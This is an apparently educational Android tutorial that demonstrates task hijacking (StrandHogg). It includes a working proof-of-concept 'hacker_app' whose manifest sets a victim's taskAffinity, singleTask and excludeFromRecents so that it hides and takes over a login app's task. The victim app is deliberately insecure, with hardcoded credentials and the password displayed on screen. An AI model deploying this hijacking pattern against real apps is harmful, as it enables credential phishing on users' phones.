Hello geeks, today we are going to learn a very new and important concept of Android known as Task or activity hijacking. This concept teaches us how attackers or hackers hijack applications and steal important data from applications in our mobile phones. The concept of Task Hijacking was first introduced by USENIX in 2015. It is also called Strandhogg by many researchers.
Understanding the concept
An android application consists of many tasks in it. A task is a collection of activities and steps performed. Whenever we run an application there is an action called a back stack which means the last task which we opened or done. So, the main idea is to change the task or activity at run time by changing some configurations in the Manifest File of the application. Let us understand back stack and current activity(foreground activity) with an example-
- An activity named A1 is running as a current or foreground activity.
- We open another activity named A2.
- Now A1 is pushed in the back stack and A2 becomes the foreground activity.
- When activity A2 is closed activity A1 again becomes foreground activity.
This is how navigation between activities works in Android applications.
Understanding some important terms
Task affinity: Task affinity is an attribute which indicates that which task an activity prefers to belong to. By default, all activities in the same app prefer to be in the same task. Piece of code used for task affinity
<activity android:taskAffinity=""/>
Launch modes: Launch modes allow you to define how a new instance of an activity is associated with the current task. The work of the launch mode attribute is to specify the instruction on how the activity should be launched in a particular task. There are four different types of launch modes
- standard
- singleTop
- singleTask
- singleInstance
What we are going to do in this article?
In this article, we will create two applications named hacker_app and user_application. We can consider user_application as a normal application which user uses and hacker_app as the application which will hijack user_application to steal data from the user. A sample video is shown below of what we are going to build in this article so that we can prove the concept of Task Hijacking.
Note: To identify task hijacking inside an application we will look at one thing in the manifest file. The application can only be hijacked if the launch mode is “singleTask” of an activity.
Step by Step Implementation to create user_application
Step 1: Create a New Project
- Open a new project.
- We will be working on Empty Activity with language as Java. Leave all other options unchanged.
- Name the application as user_application.
- There will be two default files named activity_main.xml and MainActivity.java.
If you don’t know how to create a new project in Android Studio then you can refer to How to Create/Start a New Project in Android Studio?
Step 2: Working on XML files
Navigate to the app > res > layout > activity_main.xml and add the below code to that file. Below is the code for the activity_main.xml file.
XML
<? xml version = "1.0" encoding = "utf-8" ?> < androidx.constraintlayout.widget.ConstraintLayout android:layout_width = "match_parent" android:layout_height = "match_parent" tools:context = ".MainActivity" > < TextView android:id = "@+id/textView2" android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:text = "Login Below" android:textSize = "32dp" app:layout_constraintBottom_toBottomOf = "parent" app:layout_constraintHorizontal_bias = "0.498" app:layout_constraintLeft_toLeftOf = "parent" app:layout_constraintRight_toRightOf = "parent" app:layout_constraintTop_toTopOf = "parent" app:layout_constraintVertical_bias = "0.057" /> < EditText android:id = "@+id/username" android:layout_width = "363dp" android:layout_height = "48dp" android:ems = "10" android:hint = "Enter your Username" android:inputType = "textPersonName" app:layout_constraintBottom_toBottomOf = "parent" app:layout_constraintEnd_toEndOf = "parent" app:layout_constraintStart_toStartOf = "parent" app:layout_constraintTop_toTopOf = "parent" app:layout_constraintVertical_bias = "0.231" /> < EditText android:id = "@+id/password" android:layout_width = "363dp" android:layout_height = "48dp" android:layout_marginBottom = "432dp" android:ems = "10" android:hint = "Enter your Password" android:inputType = "textPassword" app:layout_constraintBottom_toBottomOf = "parent" app:layout_constraintEnd_toEndOf = "parent" app:layout_constraintStart_toStartOf = "parent" app:layout_constraintTop_toBottomOf = "@+id/editTextTextPersonName" app:layout_constraintVertical_bias = "0.05" tools:ignore = "UnknownId" /> < Button android:id = "@+id/button" android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:layout_marginBottom = "340dp" android:onClick = "movepage" android:text = "Login" app:layout_constraintBottom_toBottomOf = "parent" app:layout_constraintEnd_toEndOf = "parent" app:layout_constraintHorizontal_bias = "0.498" app:layout_constraintStart_toStartOf = "parent" app:layout_constraintTop_toBottomOf = "@+id/password" /> </ androidx.constraintlayout.widget.ConstraintLayout > |
Follow the path app > right click > new > activity > Empty Activity > name it as “LoggedIn”. Navigate to the app > res > layout > activity_logged_in.xml and add the below code to that file. Below is the code for the activity_logged_in.xml file.
XML
<? xml version = "1.0" encoding = "utf-8" ?> < androidx.constraintlayout.widget.ConstraintLayout android:layout_width = "match_parent" android:layout_height = "match_parent" tools:context = ".LoggedIn" > < TextView android:id = "@+id/userdisp" android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:text = "TextView" app:layout_constraintBottom_toTopOf = "@+id/passdisp" app:layout_constraintEnd_toEndOf = "parent" app:layout_constraintHorizontal_bias = "0.498" app:layout_constraintStart_toStartOf = "parent" app:layout_constraintTop_toTopOf = "parent" app:layout_constraintVertical_bias = "0.87" /> < TextView android:id = "@+id/passdisp" android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:layout_marginBottom = "500dp" android:text = "TextView" app:layout_constraintBottom_toBottomOf = "parent" app:layout_constraintEnd_toEndOf = "parent" app:layout_constraintHorizontal_bias = "0.498" app:layout_constraintStart_toStartOf = "parent" /> < TextView android:id = "@+id/textView4" android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:text = "Your Account Details" app:layout_constraintBottom_toTopOf = "@+id/userdisp" app:layout_constraintEnd_toEndOf = "parent" app:layout_constraintStart_toStartOf = "parent" app:layout_constraintTop_toTopOf = "parent" /> </ androidx.constraintlayout.widget.ConstraintLayout > |
Navigate to app > manifests > AndroidManifest.xml and use the below code in it-
XML
<? xml version = "1.0" encoding = "utf-8" ?> package = "com.example.user_application" > < application android:allowBackup = "true" android:icon = "@mipmap/ic_launcher" android:logo = "@mipmap/ic_launcher" android:label = "@string/app_name" android:roundIcon = "@mipmap/ic_launcher_round" android:supportsRtl = "true" android:theme = "@style/Theme.User_application" > < activity android:name = ".LoggedIn" ></ activity > < activity android:name = ".MainActivity" android:launchMode = "singleTask" android:exported = "true" > < intent-filter > < action android:name = "android.intent.action.MAIN" /> < category android:name = "android.intent.category.LAUNCHER" /> </ intent-filter > </ activity > </ application > </ manifest > |
Note that launch mode is set to “singleTask”, this is where the vulnerability exists.
Step 3: Working on java files
Go to the MainActivity.java file and refer to the following code. Below is the code for the MainActivity.java file.
Java
package com.example.user_application; import android.content.Intent; import android.os.Bundle; import android.view.View; import android.widget.Button; import android.widget.EditText; import androidx.appcompat.app.AppCompatActivity; public class MainActivity extends AppCompatActivity { EditText username, password; Button clk; @Override protected void onCreate(Bundle savedInstanceState) { super .onCreate(savedInstanceState); setContentView(R.layout.activity_main); username = (EditText)findViewById(R.id.username); password = (EditText)findViewById(R.id.password); clk = (Button)findViewById(R.id.button); } public void movepage(View v) { String stname = username.getText().toString(); String stpass = password.getText().toString(); if (stname.equals( "gfg" ) && stpass.equals( "gfg123" )) { Intent in = new Intent(MainActivity. this , LoggedIn. class ); in.putExtra( "username" , stname); in.putExtra( "password" , stpass); startActivity(in); } } } |
Go to the LoggedIn.java file and refer to the following code. Below is the code for the LoggedIn.java file.
Java
package com.example.user_application; import android.content.Intent; import android.os.Bundle; import android.widget.EditText; import android.widget.TextView; import androidx.appcompat.app.AppCompatActivity; public class LoggedIn extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super .onCreate(savedInstanceState); setContentView(R.layout.activity_logged_in); TextView userdisp = (TextView)findViewById(R.id.userdisp); TextView passdisp = (TextView)findViewById(R.id.passdisp); Intent intent = getIntent(); String username = intent.getStringExtra( "username" ); String password = intent.getStringExtra( "password" ); userdisp.setText(username); passdisp.setText(password); } } |
Now our user_application is created successfully.
Step by step implementation to create hacker_app
Step 1: Create a New Project
- Open a new project.
- We will be working on Empty Activity with language as Java. Leave all other options unchanged.
- Name the application as user_application.
- There will be two default files named activity_main.xml and MainActivity.java.
If you don’t know how to create a new project in Android Studio then you can refer to How to Create/Start a New Project in Android Studio?
Step 2: Working on activity_main.xml files
Navigate to the app > res > layout > activity_main.xml and add the below code to that file. Below is the code for the activity_main.xml file.
XML
<? xml version = "1.0" encoding = "utf-8" ?> < androidx.constraintlayout.widget.ConstraintLayout android:layout_width = "match_parent" android:layout_height = "match_parent" tools:context = ".MainActivity" > < TextView android:id = "@+id/textView" android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:text = "Hacker App" android:textSize = "32dp" app:layout_constraintBottom_toBottomOf = "parent" app:layout_constraintLeft_toLeftOf = "parent" app:layout_constraintRight_toRightOf = "parent" app:layout_constraintTop_toTopOf = "parent" /> < TextView android:id = "@+id/msg" android:layout_width = "wrap_content" android:layout_height = "wrap_content" android:text = "TextView" app:layout_constraintBottom_toBottomOf = "parent" app:layout_constraintEnd_toEndOf = "parent" app:layout_constraintHorizontal_bias = "0.498" app:layout_constraintStart_toStartOf = "parent" app:layout_constraintTop_toBottomOf = "@+id/textView" app:layout_constraintVertical_bias = "0.175" /> </ androidx.constraintlayout.widget.ConstraintLayout > |
Step 3: Working on MainActivity.java file
Go to the MainActivity.java file and refer to the following code. Below is the code for the MainActivity.java file.
Java
package com.example.hacker_app; import android.Manifest; import android.content.Intent; import android.content.pm.PackageManager; import android.os.Build; import android.os.Bundle; import android.view.View; import android.widget.EditText; import android.widget.TextView; import androidx.appcompat.app.AppCompatActivity; import androidx.core.app.ActivityCompat; import com.google.android.material.snackbar.Snackbar; public class MainActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super .onCreate(savedInstanceState); setContentView(R.layout.activity_main); moveTaskToBack( true ); } @Override public void onResume() { super .onResume(); setContentView(R.layout.activity_main); } } |
Step 4: Working on AndroidManifest.xml file
XML
<? xml version = "1.0" encoding = "utf-8" ?> package = "com.example.hacker_app" tools:ignore = "ExtraText" > < uses-permission android:name = "android.permission.ACCESS_FINE_LOCATION" tools:ignore = "CoarseFineLocation" /> < application android:allowBackup = "true" android:icon = "@mipmap/ic_launcher" android:label = "@string/app_name" android:roundIcon = "@mipmap/ic_launcher_round" android:supportsRtl = "true" android:theme = "@style/Theme.Hacker_app" android:taskAffinity = "com.example.user_application" > < activity android:name = ".MainActivity" android:launchMode = "singleTask" android:excludeFromRecents = "true" android:exported = "true" tools:ignore = "WrongManifestParent" > < intent-filter > < action android:name = "android.intent.action.MAIN" /> < category android:name = "android.intent.category.LAUNCHER" /> </ intent-filter > </ activity > </ application > </ manifest > |
Note:
Here, since we want to target our user_application, we’ll define the task affinity using its package name
android:taskAffinity=”com.example.user_application”
Another thing android:excludeFromRecents ensures the task is not listed in the recent apps so that the attackers’ app is hidden.
Install both the applications on a mobile phone.
Output:
In the above video it can be seen that when the user_application is opened normally, it runs in its own task. When I open the hacker_app, nothing happens in the foreground but the app opens and minimizes itself hiding from recent apps due to the attributes defined above. Now when the user_application is opened again, it can be seen that the hacker_app hijacks the task of user_application. So, this was all about the demonstration of the concept of Task Hijacking.